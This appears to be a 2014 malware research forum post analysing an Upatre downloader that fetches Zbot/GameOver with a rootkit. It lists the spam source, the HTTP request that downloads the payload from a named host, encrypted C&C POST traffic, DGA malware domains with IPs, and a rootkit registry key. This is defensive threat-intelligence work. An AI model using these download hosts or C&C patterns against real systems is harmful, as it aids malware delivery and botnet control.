Upatre downlods new Zbot/GMO w/rootkit
Spam:
Is Cutwail with this source IP:
Code: Select allReceived: from unknown (HELO 18.98-30-64.static.virginmediabusiness.co.uk) (62.30.98.18)
by 202.143.83.13 with SMTP; 19 Mar 2014 02:55:40 +0900
Downloading Zbot here:
Header:
Code: Select allGET /images/TARGT.tp HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: jswcompounding-usa.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Mar 2014 23:59:34 GMT
Content-Length: 483608
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 18 Mar 2014 11:02:34 GMT
Accept-Ranges: bytes
ZZP..q...Z.....+...V2..........etc etc
The whole package, Malware family picture:
Zbot cnc callbacks, same pattern as per previous case here:
http://www.kernelmode.info/forum/viewto ... 230#p22467
The text of header CNC calls of Zbot:
Code: Select allPOST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555
.&.......q..Zb.tD.,.F.......v1xr.<
\.=..+.,%.8oe.......'...'...R@.NSNhK'A
.<TC.OVF.I]D.:R7sK#BvNRO.O]F.f.........
.......}Y.....!0.@.0.lS.5.g............
...37g?3h.......!...!...
iL1xh..xhv1xhv1xhv1xhv1xhv1xhv1xhk.....
..........j..Nkv1xk9E.9f?xkm.......
...
...lt.rnv=xmv=.io.......'...'...
nv7xow6xnv1.jw7..v#xov7xov7xov7xov7..v#
Zbot attempt to connect to below malware domains:
Code: Select allaulbbiwslxpvvphxnjij.biz
aqxoythmntgevmjqsjrugdadhyjn.com
rwinsaewkqkrokrhucofaqwxwkv.ru
tcvkwsbqnjhjobgyttklnfxo.com
xohmozgqxkncqcmljrqsyllkrfy.biz
zxxpvolvljwkeuofkukydiugrwro.org
hgfuzrgylxkllnbkrvorkuox.info
desushrswsiinxwzprvogafml.com
nqocjrqxuknbmbqgkhmtoxpcu.ru
jbdswlfxvctooztvgjfdbquspr.biz
bywcdgijrswmbeulnmjsijcx.info
eqqcdilqbqfxspbecde.org
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
ztcpgudtkrwpzjrpcebaoxgp.ru
mptwtibibmrhqtobeizlzzdnfwc.com
xwporinufyfyrgdnvzplrfaofbpf.net
PoC:
It seems like this Zbot want to play DGA, two IP addresses are active now under ENOM domain registration..
Code: Select allaulbbiwslxpvvphxnjij.biz 50.116.4.71,
xwporinufyfyrgdnvzplrfaofbpf.net 107.158.75.30,
All are in US Network...
Code: Select allWed Mar 19 10:54:24 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE
Wed Mar 19 10:55:09 JST 2014|107.158.75.30||30693 | 107.158.72.0/22 | SERVERHUB-PHOENIX | US | SERVERHUB.COM | SERVERHUB
Rootkit used:
https://www.virustotal.com/en/file/f147 ... 395189543/
Registry hooks:
Code: Select allHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_242B8E047E8C5D29\0000\Control
Name: ActiveService
Type: unicode
data: 242b8e047e8c5d29
Sample is attached w/PCAP.
#MalwareMustDie